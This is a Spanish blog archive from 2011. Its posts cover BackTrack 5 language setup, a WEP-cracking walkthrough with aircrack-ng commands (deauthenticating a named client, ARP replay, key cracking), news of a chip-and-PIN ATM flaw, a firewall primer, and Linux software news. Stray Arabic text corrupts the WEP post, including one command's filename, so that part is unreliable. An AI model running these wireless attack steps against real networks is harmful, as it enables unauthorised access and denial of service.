miércoles, 18 de mayo de 2011

Cambiar de Idioma a Backtrack 5 GNOME

Hola a todos, en este post les explicare como cambiar el idioma de nuestro Backtrack 5 GNOME, para aquellos que tengan instalado este entorno de escritorio GNOME, seguro les es dificil encontrar la forma de cambiar idioma, pero sin dejando de rodeos, voy al grano:

1.- Primer Paso: Abrir el terminal



2.- Segundo Paso : Poner en el terminal lo siguiente:

apt-get install language-selector



3.- Luego de dejar que carge, ponemos lo 
siguiente en el mismo terminal:

gnome-language-selector

Y nos aparecera esta advertencia, le damos a 
Install o Instalar(bueno a mi me sale Instalar porque estuve viendo como cambiar el idioma y modifique algunas cosas con otros metodos para cambiar de idioma en GNOME, por eso algunas cosas me salen en español)...



4.- Luego eligiremos el Idioma a instalar
( Primero vamos a textos y elegimos el idioma que queramos, luego a Idiomas, en Idioma hacemos click en Instalar o eliminar, en otros casos Add or Remove, y nos saldra una ventana buscamos el idioma ingles o english y lequitamos el check que tiene y luego seleccionamos el idioma a instalar y le marcamos una check).



5.- Luego dejamos que cargue demora unos 
minutos, luego nos saldra una pantalla como esta y le damos close o cerrar:


6.- Luego cerramos la ventanita de la configuracion de idioma y listo ponemos en nuestro terminal " shutdown -r now " para reiniciar y surgan los efectos.



7.- Totalmente en Español (Bueno elegi mi 
idioma nativo ):



Bueno esto es todo...

Dios les bendiga



PD: Para cambiar idioma a Firefox luego 
de hacer todo este tutorial, ponemos en un terminal:

aptitude upgrade y apt-get upgrade
 
Dejen que cargue, demora unos minutos y listo... Fuente:Taringa

sábado, 14 de mayo de 2011

Video Cracking WEP - Desasociando un cliente conectado al AP

En este vide se muestra el ataque 0 - Deautenticación para desasociar un cliente conectado al punto de acceso y asi obtener la clave WEP (Wired Equivalent Privacy) de la red inalambrica. El objetivo principal de los paquetes de deautenticación es interrumpir-romper la asociacion entre el cliente conectadioy el AP (Access Point). El ataque 0 o de Deautenticación (--deauth) es también conocido como el ataque DoS (Denegacion de Servicio), pero no es el propósito del vídeo.

Ataque 0: Deautenticación
Ataque 3: Reinyección de una petición ARP (ARP-request)
Estos pasos también se puede revisar en el post anterior.

Herramientas
* Backtrack 4 R2
http://www.backtrack-linux.org/downloads/
* Aircrack-ng (incluida en BackTrack)
http://www.aircrack-ng.org/
* Tarjeta WiFi que soporte el modo Monitor y la Inyección د باقويتيس.



Attack 0: Deauthentication + Attack 3: ARP Packets Injection = Key Found!! from delfirosales on Vimeo.

Comandos
root@bt:~# airmon-ng start wlan0

root@bt:~# airodump-ng mon0

root@bt:~# airodump-ng --bssid 00:18:3F:18:85:C9 --channel 6 --write captura mon0

root@bt:~# aireplay-ng --deauth 10 -a 00:18:3F:18:85:C9 -c 0C:60:76:71:D5:5B mon0

root@bt:~# aireplay-ng --arpreplay -e WifiAttack -b 00:18:3F:18:85:C9 -h 0C:60:76:71:D5:5B mon0

root@bt:~# aircrack-ng captura-01.شاب
 
Vídeo Online
http://youtu.be/jUeBo2qBNJg?hd=1
Descargar Vídeo
http://www.mediafire.com/?q9doqdr2539c06b


Descubren manera de sacar dinero de cajeros automáticos, y sin clave


Esta noticia de hoy espero que se difunda lo antes posible por todos los medios, pero sin querer alarmar mucho solo diré que se ha descubierto lo que posiblemente sea el problema de seguridad mas grande jamás enfrentado por la industria de los cajeros automáticos…
Un equipo de investigadores de Cambridge University en el Reino Unido han descubierto una manera “extremadamente sencilla” en engañar a cualquier cajero automático para que debite dinero de una cuenta, incluso sin el estafador saber la clave (o “PIN”) del dueño de la tarjeta.

Los investigadores aun no quieren dar detalles del ataque por motivos obvios (aunque se sospecha que la técnica ya se conocen en el mercado negro, dado casos de personas que reportan que dinero mágicamente desaparece de sus cuentas), pero el ataque consiste de primero clonar una tarjeta de cualquier persona (algo que hoy día es totalmente trivial y que lo puede hacer incluso alguien con muy pocos conocimientos técnicos), y después utilizar un software especial conectada a una laptop.

Lo que sucede en el próximo paso es que de la laptop sale conectado por medio de un fino cable la tarjeta clonada, que se inserta en el cajero automático. En este momento, el cajero automático pide el PIN del usuario, y es aquí en donde viene el gran problema: Los investigadores han descubierto una falla fatal en los sistemas de verificación de PIN en los cajeros automáticos que permite que uno no necesite la clave para sacar dinero. En otras palabras, en este punto el cajero acepta cualquier clave como valida.

Para demostrar la veracidad y seriedad del caso, reporteros de la BBC de Londres visitaron a los investigadores de Cambridge y sacaron de sus carteras un par de tarjetas de débito, las cuales fueron inmediatamente clonadas, insertadas en un cajero cercano, y ciertamente sacaran dinero de las cuentas sin ningún problema. Como dicen, oh oh…

La seriedad del caso es que como dicen los mismos investigadores: “Esta es una falla en un sistema que es utilizado por cientos de millones de personas, por decenas de miles de bancos y millones de vendedores.”
Y como agrega el Profesor Ross Anderson, uno de los investigadores principales de este descubrimiento: “Creemos que esta es una de las mas graves fallas que hemos descubierto – que se han descubierto jamás – en sistemas de pagos, y yo he estado en este negocio [de descubrir fallas de seguridad] por 25 años.”

En otras palabras, solo esperemos que las instituciones financieras de todo el mundo se percaten de este problema y empiecen a implementar una solución lo antes posible. Mientras tanto, si se les esfuma el dinero de sus cuentas de manera “mágica”, ya pueden apuntarle este artículo a sus bancos como evidencia de que algo feo podría estar ocurriendo…
Página oficial que describre el ataque de seguridad
Fuente de la noticia

¿Realmente nos protege un Firewall?

Estar detrás de un firewall no es garantía de estar seguros al 100%. La seguridad de nuestra red muchas veces no depende de las herramientas o aplicaciones sino de cómo se utilizan las mismas.

Conectarnos a Internet sin contar con las herramientas adecuadas y con un firewall bien configurado es el equivalente a tener una casa sin cerraduras en las puertas. Un intruso puede tomar control de los servidores o de las PCs de los usuarios y tener acceso a información privilegiada.


¿Qué es un Firewall? básicamente es un filtro capaz de controlar y examinar todas las comunicaciones, entrantes y salientes, que pasan de una red a otra permitiendo o denegando el acceso.

Un firewall (o cortafuegos) se utiliza para proteger una computadora o una red interna, de intentos de acceso no autorizados desde Internet u otras redes externas, denegando las transmisiones y vigilando todos los puertos de red. Su uso más común es situarlo entre una red local e Internet, evitando que los intrusos puedan atacar o acceder las computadoras de la red local.

Existen dos tipos básicos de firewall disponibles: firewall por hardware y firewall por software. Comúnmente se suele combinar ambos en una red para aumentar la seguridad de la misma.

Un firewall por hardware viene instalado en la mayoría de los routers que utilizamos para acceder a Internet. Este tipo de firewall disfraza la dirección y puertos de la PC a los intrusos y monitorean las comunicaciones entre redes.

Un firewall por hardware nos protege del uso oculto y riesgos externos de servicios como www y ftp. También nos protege de programas maliciosos con los Trojan Dialers: programas que cortan la conexión actual y utilizan la línea para llamadas de larga distancia utilizadas por terceros.

Ejemplos de firewall por hardware son: Panda GateDefender Integra 100 y 300, D-Link DFL 800 y la serie Cisco ASA 5500 Adaptive Security Appliances, por nombrar algunos.

Un firewall por software es una aplicación de seguridad que se puede instalar o viene integrada con el sistema operativo. Este tipo de firewall monitorea y bloquea siempre que sea necesario el tráfico de Internet.

Ejemplos de firewall por software son: Zone Alarm, Agnitum Outpost Free y Sygate Personal Firewall, por nombrar algunos.

Una limitación importante de la mayoría de firewall por software es que solo controla los paquetes que llegan a nuestro ordenador y no los que se envían.

¿Es necesario un firewall por software si tengo un router? un firewall por hardware no consume recursos del sistema y una vez configurado protege a todos los equipos en la red. Pero no todos los routers cubren las principales opciones (routers caseros) ni todos los equipos se conectan siempre a la misma red.

Si utilizamos un equipo portátil el uso de una aplicación firewall instalada en nuestro sistema es indispensable ya que el acceso a internet lo podemos hacer por medio de redes privadas o públicas de las cuales no sabemos ni su configuración ni el tipo de información que circula por la misma.

Hay que tener en cuenta que un firewall independientemente si es por hardware o software no nos protegerá de ataques cuyo tráfico no pase por el mismo, de la copia local de datos en medios físicos de almacenamiento, de ataques de ingeniería social, de virus informáticos en archivos o software y de fallos de seguridad de los servicios y protocolos cuyo tráfico esté permitido.

Para proteger ese 1% que queda en el aire y no importando el tipo de firewall que se use debemos utilizar un antivirus si nuestro sistema operativo lo amerita, ser cuidadoso cuando navegamos por internet, estar atento con las aplicaciones o servicios a los que permitimos acceso en nuestro firewall y de ser posible usar un política restrictiva que deniegue todo el tráfico excepto el que sea explícitamente permitido.

El mejor firewall es el que uno administra, con un firewall correctamente configurado podemos impedir el 99% de las intrusiones en nuestro sistema.

martes, 10 de mayo de 2011

Pronto BackTrack 5 !!!

Bueno chicos... Se nos viene BackTrack 5 !!!

En esencia seguira siendo la excelente herramienta de pentesting de siempre, solo que ahora se puede elegir entre KDE y Gnome para los fanaticos de Gnome XD.

El primer Release sale en 3 días (10 de mayo), así que a esperar...

Para mayor información la Web oficial: http://www.backtrack-linux.org/


Fuente:

lunes, 9 de mayo de 2011

[Descarga del día] SteadyFlow, gestor de descargas para Linux


Logo de Descargas del dia en BiteliaQue los gestores de descargas son muy útiles no cabe la menor duda. En Linux tenemos varios disponibles pero SteadyFlow es especialmente sencillo y potente por lo que cumple muy bien con su cometido y, además, no consume muchos recursos.

SteadyFlow se ha actualizado últimamente para ser compatible con Ubuntu 11.04 e incorporar ciertas novedades como la posibilidad de ejecutar un programa o comando en el momento en que una descarga termine. Las notificaciones del sistema de Ubuntu funcionarán en la nueva versión y así estaremos al tanto del estado de los archivos en descarga.

Para instalarlo sólo tenemos que añadir un repositorio y podremos utilizarlo sin problemas:

sudo add-apt-repository ppa:sikon/steadyflow
sudo apt-get update
sudo apt-get install steadyflow

SteadyFlow
Sencillo, como siempre, y libre de problemas.

Ubuntu quiere tener 200 millones de usuarios para 2015

Mark Shuttleworth, líder y fundador de Canonical, la empresa sudafricana detrás de la distribución Linux más popular de la última década, Ubuntu, afirmó durante su keynote en la Ubuntu Developer Summit que su objetivo es contar con 200 millones de usuarios dentro de 4 años:
No estamos jugando a favor del corazón y la mente de los desarrolladores; estamos jugando a favor del mundo, y para lograrlo tenemos que jugar con otro tipo de reglas.
Quiero resaltarlo, Mark dirigió esas palabras a sus desarrolladores, palabras que enmarcan la visión que Mark tiene de Ubuntu. El empresario quiere sea un sistema operativo que represente una gran experiencia para los usuarios, una basada en un desarrollo retroalimentado por ellos —la comunidad—, en iteraciones constantes, semestrales, que apunten a lo más alto, a la usabilidad —oh, qué cuestión más subjetiva (lo digo en serio)— de Windows 7 o Mac OS X.

¿Cómo es que Canonical conseguirá esa inmensa base de usuarios? Difusión, publicidad, marketing en internet, radio y televisión, nuevos y grandes contratos con fabricantes, ¿Dell, HP, Acer? ¿cómo será? Creo que si Mark lo dijo es porque tiene un plan, y una seguridad que sorprende a quienes desde afuera vemos el desarrollo de Ubuntu.

A todo esto, ¿cuáles el número actual de usuarios de Ubuntu? ¿Hay cifras oficiales? Por ahora sabemos, un poco extraoficialmente de la voz de Prakash Advani quien en 2010 dijo que Ubuntu sumaba unos 12 millones de usuarios. De ser así, pasar de 12 —o un poco más este año— a 200 millones de usuarios representa un salto gigante.

No sé cómo vayan los números de Ubuntu 11.04 Natty, pero si consideramos lo que algunos llaman “el fiasco de Unity” (sí, Unity, la controvertida capa de software creada por Canonical para ponerse encima del escritorio GNOME y reemplazar a GNOME Shell), entonces esas expectativas son aún más osadas de lo que ya parecen.
Debemos reconocer, sin embargo, el impulso y difusión que Canonical —empresa a final de cuentas— le ha dado al software de código libre y abierto. Esto es, reconocer que han integrado software de calidad en un entorno amigable, con propuestas de diseño y usabilidad (Unity es eso, una propuesta muy válida), enfocado al usuario final, y, sobre todo, en constante evolución.

Ya sea que alcance esos 200 millones de usuarios o no, si Canonical tiene esos planes con Ubuntu, creo que tan sólo llegar a mitad de camino será una memorable hazaña.

VOLVIMOS

 YA ESTAMOS ACTIVOS, ASI QUE PENDIENTES